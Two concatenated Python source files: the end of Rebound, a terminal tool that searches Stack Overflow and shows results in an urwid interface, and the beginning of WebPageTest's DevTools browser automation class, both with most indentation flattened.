# TODO: Handle blockquotes and markdown
stylized_text = []
code_blocks = [block.get_text() for block in soup.find_all("code")]
blockquotes = [block.get_text() for block in soup.find_all("blockquote")]
newline = False
for child in soup.recursiveChildGenerator():
name = getattr(child, "name", None)
if name is None: # Leaf (terminal) node
if child in code_blocks:
if newline: # Code block
#if code_blocks.index(child) == len(code_blocks) - 1: # Last code block
#child = child[:-1]
stylized_text.append(("code", u"\n%s" % str(child)))
newline = False
else: # In-line code
stylized_text.append(("code", u"%s" % str(child)))
else: # Plaintext
newline = child.endswith('\n')
stylized_text.append(u"%s" % str(child))
    if isinstance(stylized_text[-2], tuple):
# Remove newline from questions/answers that end with a code block
if stylized_text[-2][1].endswith('\n'):
stylized_text[-2] = ("code", stylized_text[-2][1][:-1])
return urwid.Text(stylized_text)
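# Note (added for clarity, not part of the original module): stylize_code()
# returns an urwid.Text whose markup mixes plain strings with ("code", text)
# tuples, e.g. ["Use ", ("code", "len(x)"), " to get the length."], so the
# "code" entry in App.palette controls how inline and block code are rendered.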
def get_search_results(soup):
"""Returns a list of dictionaries containing each search result."""
search_results = []
for result in soup.find_all("div", class_="question-summary search-result"):
title_container = result.find_all("div", class_="result-link")[0].find_all("a")[0]
if result.find_all("div", class_="status answered") != []: # Has answers
answer_count = int(result.find_all("div", class_="status answered")[0].find_all("strong")[0].text)
elif result.find_all("div", class_="status answered-accepted") != []: # Has an accepted answer (closed)
answer_count = int(result.find_all("div", class_="status answered-accepted")[0].find_all("strong")[0].text)
else: # No answers
answer_count = 0
search_results.append({
"Title": title_container["title"],
#"Body": result.find_all("div", class_="excerpt")[0].text,
#"Votes": int(result.find_all("span", class_="vote-count-post ")[0].find_all("strong")[0].text),
"Answers": answer_count,
"URL": SO_URL + title_container["href"]
})
return search_results
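# Note (added for clarity, not part of the original module): each entry in the
# list returned by get_search_results() has the shape
#     {"Title": "...", "Answers": <int>, "URL": "https://stackoverflow.com/..."}
# which is what App._stylize_title() and App._get_selected_link() rely on.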
def souper(url):
"""Turns a given URL into a BeautifulSoup object."""
try:
html = requests.get(url, headers={"User-Agent": random.choice(USER_AGENTS)})
except requests.exceptions.RequestException:
sys.stdout.write("\n%s%s%s" % (RED, "Rebound was unable to fetch Stack Overflow results. "
"Please check that you are connected to the internet.\n", END))
sys.exit(1)
if re.search("\.com/nocaptcha", html.url): # URL is a captcha page
return None
else:
return BeautifulSoup(html.text, "html.parser")
## Main ##
def search_stackoverflow(query):
"""Wrapper function for get_search_results."""
soup = souper(SO_URL + "/search?pagesize=50&q=%s" % query.replace(' ', '+'))
# TODO: Randomize the user agent
    if soup is None:
return (None, True)
else:
return (get_search_results(soup), False)
def get_question_and_answers(url):
"""Returns details about a given question and list of its answers."""
soup = souper(url)
    if soup is None:  # Captcha page
return "Sorry, Stack Overflow blocked our request. Try again in a couple seconds.", "", "", ""
else:
question_title = soup.find_all('a', class_="question-hyperlink")[0].get_text()
question_stats = soup.find("div", class_="js-vote-count").get_text() # Vote count
try:
question_stats = question_stats + " Votes | " + '|'.join((((soup.find_all("div", class_="module question-stats")[0].get_text())
.replace('\n', ' ')).replace(" ", " | ")).split('|')[:2]) # Vote count, submission date, view count
except IndexError:
question_stats = "Could not load statistics."
question_desc = stylize_code(soup.find_all("div", class_="post-text")[0]) # TODO: Handle duplicates
question_stats = ' '.join(question_stats.split())
answers = [stylize_code(answer) for answer in soup.find_all("div", class_="post-text")][1:]
if len(answers) == 0:
answers.append(urwid.Text(("no answers", u"\nNo answers for this question.")))
return question_title, question_desc, question_stats, answers
############
## INTERFACE
############
## Helper Classes ##
class Scrollable(urwid.WidgetDecoration):
# TODO: Fix scrolling behavior (works with up/down keys, not with cursor)
def sizing(self):
return frozenset([BOX,])
def selectable(self):
return True
def __init__(self, widget):
"""Box widget (wrapper) that makes a fixed or flow widget vertically scrollable."""
self._trim_top = 0
self._scroll_action = None
self._forward_keypress = None
self._old_cursor_coords = None
self._rows_max_cached = 0
self._rows_max_displayable = 0
self.__super.__init__(widget)
def render(self, size, focus=False):
maxcol, maxrow = size
# Render complete original widget
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
canv = urwid.CompositeCanvas(ow.render(ow_size, focus))
canv_cols, canv_rows = canv.cols(), canv.rows()
if canv_cols <= maxcol:
pad_width = maxcol - canv_cols
if pad_width > 0: # Canvas is narrower than available horizontal space
canv.pad_trim_left_right(0, pad_width)
if canv_rows <= maxrow:
fill_height = maxrow - canv_rows
if fill_height > 0: # Canvas is lower than available vertical space
canv.pad_trim_top_bottom(0, fill_height)
self._rows_max_displayable = maxrow
if canv_cols <= maxcol and canv_rows <= maxrow: # Canvas is small enough to fit without trimming
return canv
self._adjust_trim_top(canv, size)
# Trim canvas if necessary
trim_top = self._trim_top
trim_end = canv_rows - maxrow - trim_top
trim_right = canv_cols - maxcol
if trim_top > 0:
canv.trim(trim_top)
if trim_end > 0:
canv.trim_end(trim_end)
if trim_right > 0:
canv.pad_trim_left_right(0, -trim_right)
# Disable cursor display if cursor is outside of visible canvas parts
if canv.cursor is not None:
curscol, cursrow = canv.cursor
if cursrow >= maxrow or cursrow < 0:
canv.cursor = None
# Let keypress() know if original_widget should get keys
self._forward_keypress = bool(canv.cursor)
return canv
def keypress(self, size, key):
if self._forward_keypress:
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
# Remember previous cursor position if possible
if hasattr(ow, "get_cursor_coords"):
self._old_cursor_coords = ow.get_cursor_coords(ow_size)
key = ow.keypress(ow_size, key)
if key is None:
return None
# Handle up/down, page up/down, etc
command_map = self._command_map
if command_map[key] == urwid.CURSOR_UP:
self._scroll_action = SCROLL_LINE_UP
elif command_map[key] == urwid.CURSOR_DOWN:
self._scroll_action = SCROLL_LINE_DOWN
elif command_map[key] == urwid.CURSOR_PAGE_UP:
self._scroll_action = SCROLL_PAGE_UP
elif command_map[key] == urwid.CURSOR_PAGE_DOWN:
self._scroll_action = SCROLL_PAGE_DOWN
elif command_map[key] == urwid.CURSOR_MAX_LEFT: # "home"
self._scroll_action = SCROLL_TO_TOP
elif command_map[key] == urwid.CURSOR_MAX_RIGHT: # "end"
self._scroll_action = SCROLL_TO_END
else:
return key
self._invalidate()
def mouse_event(self, size, event, button, col, row, focus):
ow = self._original_widget
if hasattr(ow, "mouse_event"):
ow_size = self._get_original_widget_size(size)
row += self._trim_top
return ow.mouse_event(ow_size, event, button, col, row, focus)
else:
return False
def _adjust_trim_top(self, canv, size):
"""Adjust self._trim_top according to self._scroll_action"""
action = self._scroll_action
self._scroll_action = None
maxcol, maxrow = size
trim_top = self._trim_top
canv_rows = canv.rows()
if trim_top < 0:
# Negative trim_top values use bottom of canvas as reference
trim_top = canv_rows - maxrow + trim_top + 1
if canv_rows <= maxrow:
self._trim_top = 0 # Reset scroll position
return
def ensure_bounds(new_trim_top):
return max(0, min(canv_rows - maxrow, new_trim_top))
if action == SCROLL_LINE_UP:
self._trim_top = ensure_bounds(trim_top - 1)
elif action == SCROLL_LINE_DOWN:
self._trim_top = ensure_bounds(trim_top + 1)
elif action == SCROLL_PAGE_UP:
            self._trim_top = ensure_bounds(trim_top - maxrow + 1)
elif action == SCROLL_PAGE_DOWN:
            self._trim_top = ensure_bounds(trim_top + maxrow - 1)
elif action == SCROLL_TO_TOP:
self._trim_top = 0
elif action == SCROLL_TO_END:
self._trim_top = canv_rows - maxrow
else:
self._trim_top = ensure_bounds(trim_top)
if self._old_cursor_coords is not None and self._old_cursor_coords != canv.cursor:
self._old_cursor_coords = None
curscol, cursrow = canv.cursor
if cursrow < self._trim_top:
self._trim_top = cursrow
elif cursrow >= self._trim_top + maxrow:
self._trim_top = max(0, cursrow - maxrow + 1)
def _get_original_widget_size(self, size):
ow = self._original_widget
sizing = ow.sizing()
if FIXED in sizing:
return ()
elif FLOW in sizing:
return (size[0],)
def get_scrollpos(self, size=None, focus=False):
return self._trim_top
def set_scrollpos(self, position):
self._trim_top = int(position)
self._invalidate()
def rows_max(self, size=None, focus=False):
if size is not None:
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
sizing = ow.sizing()
if FIXED in sizing:
self._rows_max_cached = ow.pack(ow_size, focus)[1]
elif FLOW in sizing:
self._rows_max_cached = ow.rows(ow_size, focus)
else:
raise RuntimeError("Not a flow/box widget: %r" % self._original_widget)
return self._rows_max_cached
@property
def scroll_ratio(self):
return self._rows_max_cached / self._rows_max_displayable
class ScrollBar(urwid.WidgetDecoration):
# TODO: Change scrollbar size and color(?)
def sizing(self):
return frozenset((BOX,))
def selectable(self):
return True
def __init__(self, widget, thumb_char=u'\u2588', trough_char=' ',
side=SCROLLBAR_RIGHT, width=1):
"""Box widget that adds a scrollbar to `widget`."""
self.__super.__init__(widget)
self._thumb_char = thumb_char
self._trough_char = trough_char
self.scrollbar_side = side
self.scrollbar_width = max(1, width)
self._original_widget_size = (0, 0)
self._dragging = False
def render(self, size, focus=False):
maxcol, maxrow = size
ow = self._original_widget
ow_base = self.scrolling_base_widget
ow_rows_max = ow_base.rows_max(size, focus)
if ow_rows_max <= maxrow: # Canvas fits without scrolling - no scrollbar needed
self._original_widget_size = size
return ow.render(size, focus)
sb_width = self._scrollbar_width
self._original_widget_size = ow_size = (maxcol-sb_width, maxrow)
ow_canv = ow.render(ow_size, focus)
pos = ow_base.get_scrollpos(ow_size, focus)
posmax = ow_rows_max - maxrow
# Thumb shrinks/grows according to the ratio of
# <number of visible lines> / <number of total lines>
thumb_weight = min(1, maxrow / max(1, ow_rows_max))
thumb_height = max(1, round(thumb_weight * maxrow))
# Thumb may only touch top/bottom if the first/last row is visible
top_weight = float(pos) / max(1, posmax)
top_height = int((maxrow-thumb_height) * top_weight)
if top_height == 0 and top_weight > 0:
top_height = 1
# Bottom part is remaining space
bottom_height = maxrow - thumb_height - top_height
assert thumb_height + top_height + bottom_height == maxrow
# Create scrollbar canvas
top = urwid.SolidCanvas(self._trough_char, sb_width, top_height)
thumb = urwid.SolidCanvas(self._thumb_char, sb_width, thumb_height)
bottom = urwid.SolidCanvas(self._trough_char, sb_width, bottom_height)
sb_canv = urwid.CanvasCombine([
(top, None, False),
(thumb, None, False),
(bottom, None, False),
])
combinelist = [(ow_canv, None, True, ow_size[0]), (sb_canv, None, False, sb_width)]
if self._scrollbar_side != SCROLLBAR_LEFT:
return urwid.CanvasJoin(combinelist)
else:
return urwid.CanvasJoin(reversed(combinelist))
@property
def scrollbar_width(self):
return max(1, self._scrollbar_width)
@scrollbar_width.setter
def scrollbar_width(self, width):
self._scrollbar_width = max(1, int(width))
self._invalidate()
@property
def scrollbar_side(self):
return self._scrollbar_side
@scrollbar_side.setter
def scrollbar_side(self, side):
if side not in (SCROLLBAR_LEFT, SCROLLBAR_RIGHT):
raise ValueError("scrollbar_side must be 'left' or 'right', not %r" % side)
self._scrollbar_side = side
self._invalidate()
@property
def scrolling_base_widget(self):
"""Nearest `base_widget` that is compatible with the scrolling API."""
def orig_iter(w):
while hasattr(w, "original_widget"):
w = w.original_widget
yield w
yield w
def is_scrolling_widget(w):
return hasattr(w, "get_scrollpos") and hasattr(w, "rows_max")
for w in orig_iter(self):
if is_scrolling_widget(w):
return w
@property
def scrollbar_column(self):
if self.scrollbar_side == SCROLLBAR_LEFT:
return 0
if self.scrollbar_side == SCROLLBAR_RIGHT:
return self._original_widget_size[0]
def keypress(self, size, key):
return self._original_widget.keypress(self._original_widget_size, key)
def mouse_event(self, size, event, button, col, row, focus):
ow = self._original_widget
ow_size = self._original_widget_size
handled = False
if hasattr(ow, "mouse_event"):
handled = ow.mouse_event(ow_size, event, button, col, row, focus)
if not handled and hasattr(ow, "set_scrollpos"):
if button == 4: # Scroll wheel up
pos = ow.get_scrollpos(ow_size)
if pos > 0:
ow.set_scrollpos(pos - 1)
return True
elif button == 5: # Scroll wheel down
pos = ow.get_scrollpos(ow_size)
ow.set_scrollpos(pos + 1)
return True
elif col == self.scrollbar_column:
ow.set_scrollpos(int(row*ow.scroll_ratio))
if event == "mouse press":
self._dragging = True
elif event == "mouse release":
self._dragging = False
elif self._dragging:
ow.set_scrollpos(int(row*ow.scroll_ratio))
if event == "mouse release":
self._dragging = False
return False
class SelectableText(urwid.Text):
def selectable(self):
return True
def keypress(self, size, key):
return key
## Helper Functions ##
def interleave(a, b):
result = []
while a and b:
result.append(a.pop(0))
result.append(b.pop(0))
result.extend(a)
result.extend(b)
return result
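# Illustrative sketch (added for clarity, not part of the original module):
# interleave() alternates elements from two lists; note that it consumes its
# inputs with pop(0), so callers should not reuse the lists afterwards.
def _example_interleave():
    assert interleave(["a1", "a2", "a3"], ["-", "-"]) == ["a1", "-", "a2", "-", "a3"]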
## Main ##
class App(object):
def __init__(self, search_results):
self.search_results, self.viewing_answers = search_results, False
self.palette = [
("title", "light cyan,bold", "default", "standout"),
("stats", "light green", "default", "standout"),
("menu", "black", "light cyan", "standout"),
("reveal focus", "black", "light cyan", "standout"),
("no answers", "light red", "default", "standout"),
("code", "brown", "default", "standout")
]
self.menu = urwid.Text([
u'\n',
("menu", u" ENTER "), ("light gray", u" View answers "),
("menu", u" B "), ("light gray", u" Open browser "),
("menu", u" Q "), ("light gray", u" Quit"),
])
results = list(map(lambda result: urwid.AttrMap(SelectableText(self._stylize_title(result)), None, "reveal focus"), self.search_results)) # TODO: Add a wrap='clip' attribute
content = urwid.SimpleListWalker(results)
self.content_container = urwid.ListBox(content)
layout = urwid.Frame(body=self.content_container, footer=self.menu)
self.main_loop = urwid.MainLoop(layout, self.palette, unhandled_input=self._handle_input)
self.original_widget = self.main_loop.widget
self.main_loop.run()
def _handle_input(self, input):
if input == "enter": # View answers
url = self._get_selected_link()
            if url is not None:
self.viewing_answers = True
question_title, question_desc, question_stats, answers = get_question_and_answers(url)
pile = urwid.Pile(self._stylize_question(question_title, question_desc, question_stats) + [urwid.Divider('*')] +
interleave(answers, [urwid.Divider('-')] * (len(answers) - 1)))
padding = ScrollBar(Scrollable(urwid.Padding(pile, left=2, right=2)))
#filler = urwid.Filler(padding, valign="top")
linebox = urwid.LineBox(padding)
menu = urwid.Text([
u'\n',
("menu", u" ESC "), ("light gray", u" Go back "),
("menu", u" B "), ("light gray", u" Open browser "),
("menu", u" Q "), ("light gray", u" Quit"),
])
self.main_loop.widget = urwid.Frame(body=urwid.Overlay(linebox, self.content_container, "center", ("relative", 60), "middle", 23), footer=menu)
elif input in ('b', 'B'): # Open link
url = self._get_selected_link()
            if url is not None:
webbrowser.open(url)
elif input == "esc": # Close window
if self.viewing_answers:
self.main_loop.widget = self.original_widget
self.viewing_answers = False
else:
raise urwid.ExitMainLoop()
elif input in ('q', 'Q'): # Quit
raise urwid.ExitMainLoop()
def _get_selected_link(self):
focus_widget, idx = self.content_container.get_focus() # Gets selected item
title = focus_widget.base_widget.text
for result in self.search_results:
if title == self._stylize_title(result): # Found selected title's search_result dict
return result["URL"]
def _stylize_title(self, search_result):
if search_result["Answers"] == 1:
return "%s (1 Answer)" % search_result["Title"]
else:
return "%s (%s Answers)" % (search_result["Title"], search_result["Answers"])
def _stylize_question(self, title, desc, stats):
new_title = urwid.Text(("title", u"%s" % title))
new_stats = urwid.Text(("stats", u"%s\n" % stats))
return [new_title, desc, new_stats]
#######
## MAIN
#######
## Helper Functions ##
def confirm(question):
"""Prompts a given question and handles user input."""
valid = {"yes": True, 'y': True, "ye": True,
"no": False, 'n': False, '': True}
prompt = " [Y/n] "
while True:
print(BOLD + CYAN + question + prompt + END)
choice = input().lower()
if choice in valid:
return valid[choice]
print("Please respond with 'yes' or 'no' (or 'y' or 'n').\n")
def print_help():
"""Prints usage instructions."""
print("%sRebound, V1.1.9a1 - Made by @shobrook%s\n" % (BOLD, END))
print("Command-line tool that automatically searches Stack Overflow and displays results in your terminal when you get a compiler error.")
print("\n\n%sUsage:%s $ rebound %s[file_name]%s\n" % (UNDERLINE, END, YELLOW, END))
print("\n$ python3 %stest.py%s => $ rebound %stest.py%s" % (YELLOW, END, YELLOW, END))
print("\n$ node %stest.js%s => $ rebound %stest.js%s\n" % (YELLOW, END, YELLOW, END))
print("\nIf you just want to query Stack Overflow, use the -q parameter: $ rebound -q %sWhat is an array comprehension?%s\n\n" % (YELLOW, END))
## Main ##
def main():
if len(sys.argv) == 1 or sys.argv[1].lower() == "-h" or sys.argv[1].lower() == "--help":
print_help()
elif sys.argv[1].lower() == "-q" or sys.argv[1].lower() == "--query":
query = ' '.join(sys.argv[2:])
search_results, captcha = search_stackoverflow(query)
if search_results != []:
if captcha:
print("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END))
return
else:
App(search_results) # Opens interface
else:
print("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END))
else:
language = get_language(sys.argv[1].lower()) # Gets the language name
if language == '': # Unknown language
print("\n%s%s%s" % (RED, "Sorry, Rebound doesn't support this file type.\n", END))
return
file_path = sys.argv[1:]
if language == 'java':
file_path = [f.replace('.class', '') for f in file_path]
output, error = execute([language] + file_path) # Compiles the file and pipes stdout
if (output, error) == (None, None): # Invalid file
return
error_msg = get_error_message(error, language) # Prepares error message for search
        if error_msg is not None:
language = 'java' if language == 'javac' else language # Fix language compiler command
query = "%s %s" % (language, error_msg)
search_results, captcha = search_stackoverflow(query)
if search_results != []:
if captcha:
print("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END))
return
elif confirm("\nDisplay Stack Overflow results?"):
App(search_results) # Opens interface
else:
print("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END))
else:
print("\n%s%s%s" % (CYAN, "No error detected :)\n", END))
return
|
devtools_browser.py
|
# Copyright 2019 WebPageTest LLC.
# Copyright 2017 Google Inc.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Base class support for browsers that speak the dev tools protocol"""
import glob
import gzip
import io
import logging
import os
import re
import shutil
import subprocess
import sys
import threading
import time
if (sys.version_info > (3, 0)):
from time import monotonic
unicode = str
GZIP_TEXT = 'wt'
else:
from monotonic import monotonic
GZIP_TEXT = 'w'
try:
import ujson as json
except BaseException:
import json
from .optimization_checks import OptimizationChecks
class DevtoolsBrowser(object):
"""Devtools Browser base"""
CONNECT_TIME_LIMIT = 120
def __init__(self, options, job, use_devtools_video=True):
self.options = options
self.job = job
self.devtools = None
self.task = None
self.event_name = None
self.browser_version = None
self.device_pixel_ratio = None
self.use_devtools_video = use_devtools_video
self.lighthouse_command = None
self.devtools_screenshot = True
self.support_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'support')
self.script_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'js')
def connect(self, task):
"""Connect to the dev tools interface"""
ret = False
from internal.devtools import DevTools
self.devtools = DevTools(self.options, self.job, task, self.use_devtools_video)
if task['running_lighthouse']:
ret = self.devtools.wait_for_available(self.CONNECT_TIME_LIMIT)
else:
if self.devtools.connect(self.CONNECT_TIME_LIMIT):
logging.debug("Devtools connected")
ret = True
else:
task['error'] = "Error connecting to dev tools interface"
logging.critical(task['error'])
self.devtools = None
return ret
def disconnect(self):
"""Disconnect from dev tools"""
if self.devtools is not None:
# Always navigate to about:blank after finishing in case the tab is
# remembered across sessions
if self.task is not None and self.task['error'] is None:
self.devtools.send_command('Page.navigate', {'url': 'about:blank'}, wait=True)
self.devtools.close()
self.devtools = None
def prepare_browser(self, task):
"""Prepare the running browser (mobile emulation, UA string, etc"""
if self.devtools is not None:
# Figure out the native viewport size
if not self.options.android:
size = self.devtools.execute_js("[window.innerWidth, window.innerHeight]")
if size is not None and len(size) == 2:
task['actual_viewport'] = {"width": size[0], "height": size[1]}
# Get the native device pixel ratio
if self.device_pixel_ratio is None:
self.device_pixel_ratio = 1.0
try:
ratio = self.devtools.execute_js('window.devicePixelRatio')
if ratio is not None:
self.device_pixel_ratio = max(1.0, float(ratio))
except Exception:
pass
# Clear the caches
if not task['cached']:
self.devtools.send_command("Network.clearBrowserCache", {},
wait=True)
self.devtools.send_command("Network.clearBrowserCookies", {},
wait=True)
# Mobile Emulation
if not self.options.android and \
'mobile' in self.job and self.job['mobile'] and \
'width' in self.job and 'height' in self.job and \
'dpr' in self.job:
width = int(re.search(r'\d+', str(self.job['width'])).group())
height = int(re.search(r'\d+', str(self.job['height'])).group())
self.devtools.send_command("Emulation.setDeviceMetricsOverride",
{"width": width,
"height": height,
"screenWidth": width,
"screenHeight": height,
"scale": 1,
"positionX": 0,
"positionY": 0,
"deviceScaleFactor": float(self.job['dpr']),
"mobile": True,
"screenOrientation":
{"angle": 0, "type": "portraitPrimary"}},
wait=True)
self.devtools.send_command("Emulation.setTouchEmulationEnabled",
{"enabled": True,
"configuration": "mobile"},
wait=True)
self.devtools.send_command("Emulation.setScrollbarsHidden",
{"hidden": True},
wait=True)
if (task['running_lighthouse'] or not self.options.throttle) and 'throttle_cpu' in self.job:
logging.debug('CPU Throttle target: %0.3fx', self.job['throttle_cpu'])
if self.job['throttle_cpu'] > 1:
self.devtools.send_command("Emulation.setCPUThrottlingRate",
{"rate": self.job['throttle_cpu']},
wait=True)
# Location
if 'lat' in self.job and 'lng' in self.job:
try:
lat = float(str(self.job['lat']))
lng = float(str(self.job['lng']))
self.devtools.send_command(
'Emulation.setGeolocationOverride',
{'latitude': lat, 'longitude': lng,
'accuracy': 0})
except Exception:
logging.exception('Error overriding location')
# UA String
ua_string = self.devtools.execute_js("navigator.userAgent")
if ua_string is not None:
match = re.search(r'Chrome\/(\d+\.\d+\.\d+\.\d+)', ua_string)
if match:
self.browser_version = match.group(1)
if 'uastring' in self.job:
ua_string = self.job['uastring']
if ua_string is not None and 'AppendUA' in task:
ua_string += ' ' + task['AppendUA']
if ua_string is not None:
self.job['user_agent_string'] = ua_string
# Disable js
if self.job['noscript']:
self.devtools.send_command("Emulation.setScriptExecutionDisabled",
{"value": True}, wait=True)
self.devtools.prepare_browser()
def on_start_recording(self, task):
"""Start recording"""
task['page_data'] = {'date': time.time()}
task['page_result'] = None
task['run_start_time'] = monotonic()
if self.browser_version is not None and 'browserVersion' not in task['page_data']:
task['page_data']['browserVersion'] = self.browser_version
task['page_data']['browser_version'] = self.browser_version
if not self.options.throttle and 'throttle_cpu' in self.job:
task['page_data']['throttle_cpu_requested'] = self.job['throttle_cpu_requested']
if self.job['throttle_cpu'] > 1:
task['page_data']['throttle_cpu'] = self.job['throttle_cpu']
if self.devtools is not None:
self.devtools.start_recording()
def on_stop_capture(self, task):
"""Do any quick work to stop things that are capturing data"""
if self.devtools is not None:
self.devtools.stop_capture()
def on_stop_recording(self, task):
"""Stop recording"""
if self.devtools is not None:
self.devtools.collect_trace()
if self.devtools_screenshot:
if self.job['pngScreenShot']:
screen_shot = os.path.join(task['dir'],
task['prefix'] + '_screen.png')
self.devtools.grab_screenshot(screen_shot, png=True)
else:
screen_shot = os.path.join(task['dir'],
task['prefix'] + '_screen.jpg')
self.devtools.grab_screenshot(screen_shot, png=False, resize=600)
# Collect end of test data from the browser
self.collect_browser_metrics(task)
# Stop recording dev tools (which also collects the trace)
self.devtools.stop_recording()
def run_task(self, task):
"""Run an individual test"""
if self.devtools is not None:
self.task = task
logging.debug("Running test")
end_time = monotonic() + task['test_time_limit']
task['current_step'] = 1
recording = False
while len(task['script']) and task['error'] is None and \
monotonic() < end_time:
self.prepare_task(task)
command = task['script'].pop(0)
if not recording and command['record']:
recording = True
self.on_start_recording(task)
self.process_command(command)
if command['record']:
self.devtools.wait_for_page_load()
if not task['combine_steps'] or not len(task['script']):
self.on_stop_capture(task)
self.on_stop_recording(task)
recording = False
self.on_start_processing(task)
self.wait_for_processing(task)
self.process_devtools_requests(task)
self.step_complete(task) #pylint: disable=no-member
if task['log_data']:
# Move on to the next step
task['current_step'] += 1
self.event_name = None
task['navigated'] = True
self.task = None
def on_start_processing(self, task):
"""Start any processing of the captured data"""
if task['log_data']:
# Start the processing that can run in a background thread
optimization = OptimizationChecks(self.job, task, self.get_requests())
optimization.start()
# Run the video post-processing
if self.use_devtools_video and self.job['video']:
self.process_video()
self.wappalyzer_detect(task, self.devtools.main_request_headers)
# wait for the background optimization checks
optimization.join()
def wait_for_processing(self, task):
"""Wait for the background processing (if any)"""
pass
def execute_js(self, script):
"""Run javascipt"""
ret = None
if self.devtools is not None:
ret = self.devtools.execute_js(script)
return ret
def prepare_task(self, task):
"""Format the file prefixes for multi-step testing"""
if task['current_step'] == 1:
task['prefix'] = task['task_prefix']
task['video_subdirectory'] = task['task_video_prefix']
else:
task['prefix'] = '{0}_{1:d}'.format(task['task_prefix'], task['current_step'])
task['video_subdirectory'] = '{0}_{1:d}'.format(task['task_video_prefix'],
task['current_step'])
if task['video_subdirectory'] not in task['video_directories']:
task['video_directories'].append(task['video_subdirectory'])
if self.event_name is not None:
task['step_name'] = self.event_name
else:
task['step_name'] = 'Step_{0:d}'.format(task['current_step'])
def process_video(self):
"""Post process the video"""
from internal.video_processing import VideoProcessing
video = VideoProcessing(self.options, self.job, self.task)
video.process()
def process_devtools_requests(self, task):
"""Process the devtools log and pull out the requests information"""
path_base = os.path.join(self.task['dir'], self.task['prefix'])
devtools_file = path_base + '_devtools.json.gz'
if os.path.isfile(devtools_file):
from internal.support.devtools_parser import DevToolsParser
out_file = path_base + '_devtools_requests.json.gz'
options = {'devtools': devtools_file, 'cached': task['cached'], 'out': out_file}
netlog = path_base + '_netlog_requests.json.gz'
options['netlog'] = netlog if os.path.isfile(netlog) else None
optimization = path_base + '_optimization.json.gz'
options['optimization'] = optimization if os.path.isfile(optimization) else None
user_timing = path_base + '_user_timing.json.gz'
options['user'] = user_timing if os.path.isfile(user_timing) else None
coverage = path_base + '_coverage.json.gz'
options['coverage'] = coverage if os.path.isfile(coverage) else None
cpu = path_base + '_timeline_cpu.json.gz'
options['cpu'] = cpu if os.path.isfile(cpu) else None
v8stats = path_base + '_v8stats.json.gz'
options['v8stats'] = v8stats if os.path.isfile(v8stats) else None
parser = DevToolsParser(options)
parser.process()
# Cleanup intermediate files that are not needed
if 'debug' not in self.job or not self.job['debug']:
if os.path.isfile(netlog):
os.remove(netlog)
if os.path.isfile(optimization):
os.remove(optimization)
if os.path.isfile(coverage):
os.remove(coverage)
if os.path.isfile(devtools_file):
os.remove(devtools_file)
if 'page_data' in parser.result and 'result' in parser.result['page_data']:
self.task['page_result'] = parser.result['page_data']['result']
def run_js_file(self, file_name):
"""Execute one of our js scripts"""
ret = None
script = None
script_file_path = os.path.join(self.script_dir, file_name)
if os.path.isfile(script_file_path):
with io.open(script_file_path, 'r', encoding='utf-8') as script_file:
script = script_file.read()
if script is not None:
ret = self.devtools.execute_js(script)
return ret
def collect_browser_metrics(self, task):
"""Collect all of the in-page browser metrics that we need"""
user_timing = self.run_js_file('user_timing.js')
if user_timing is not None:
path = os.path.join(task['dir'], task['prefix'] + '_timed_events.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(user_timing))
page_data = self.run_js_file('page_data.js')
if page_data is not None:
task['page_data'].update(page_data)
if 'customMetrics' in self.job:
custom_metrics = {}
for name in self.job['customMetrics']:
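                # Wrap each custom metric in its own function and run it inside try/catch
                # so one failing metric cannot break collection of the rest.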
script = 'var wptCustomMetric = function() {' +\
self.job['customMetrics'][name] +\
'};try{wptCustomMetric();}catch(e){};'
custom_metrics[name] = self.devtools.execute_js(script)
path = os.path.join(task['dir'], task['prefix'] + '_metrics.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(custom_metrics))
if 'heroElementTimes' in self.job and self.job['heroElementTimes']:
hero_elements = None
custom_hero_selectors = {}
if 'heroElements' in self.job:
custom_hero_selectors = self.job['heroElements']
with io.open(os.path.join(self.script_dir, 'hero_elements.js'), 'r', encoding='utf-8') as script_file:
hero_elements_script = script_file.read()
script = hero_elements_script + '(' + json.dumps(custom_hero_selectors) + ')'
hero_elements = self.devtools.execute_js(script)
if hero_elements is not None:
logging.debug('Hero Elements: %s', json.dumps(hero_elements))
path = os.path.join(task['dir'], task['prefix'] + '_hero_elements.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(hero_elements))
def process_command(self, command):
"""Process an individual script command"""
logging.debug("Processing script command:")
logging.debug(command)
if command['command'] == 'navigate':
self.task['page_data']['URL'] = command['target']
            url = str(command['target']).replace('"', '\\"')
script = 'window.location="{0}";'.format(url)
script = self.prepare_script_for_record(script) #pylint: disable=no-member
self.devtools.start_navigating()
self.devtools.execute_js(script)
elif command['command'] == 'logdata':
self.task['combine_steps'] = False
if int(re.search(r'\d+', str(command['target'])).group()):
logging.debug("Data logging enabled")
self.task['log_data'] = True
else:
logging.debug("Data logging disabled")
self.task['log_data'] = False
elif command['command'] == 'combinesteps':
self.task['log_data'] = True
self.task['combine_steps'] = True
elif command['command'] == 'seteventname':
self.event_name = command['target']
elif command['command'] == 'exec':
script = command['target']
if command['record']:
script = self.prepare_script_for_record(script) #pylint: disable=no-member
self.devtools.start_navigating()
self.devtools.execute_js(script)
elif command['command'] == 'sleep':
delay = min(60, max(0, int(re.search(r'\d+', str(command['target'])).group())))
if delay > 0:
time.sleep(delay)
elif command['command'] == 'setabm':
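            # setabm: a target of 0 means stop the measurement at onload; any other value
            # leaves activity-based measurement enabled.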
self.task['stop_at_onload'] = bool('target' in command and
int(re.search(r'\d+',
str(command['target'])).group()) == 0)
elif command['command'] == 'setactivitytimeout':
if 'target' in command:
milliseconds = int(re.search(r'\d+', str(command['target'])).group())
self.task['activity_time'] = max(0, min(30, float(milliseconds) / 1000.0))
elif command['command'] == 'setuseragent':
self.task['user_agent_string'] = command['target']
elif command['command'] == 'setcookie':
if 'target' in command and 'value' in command:
url = command['target'].strip()
cookie = command['value']
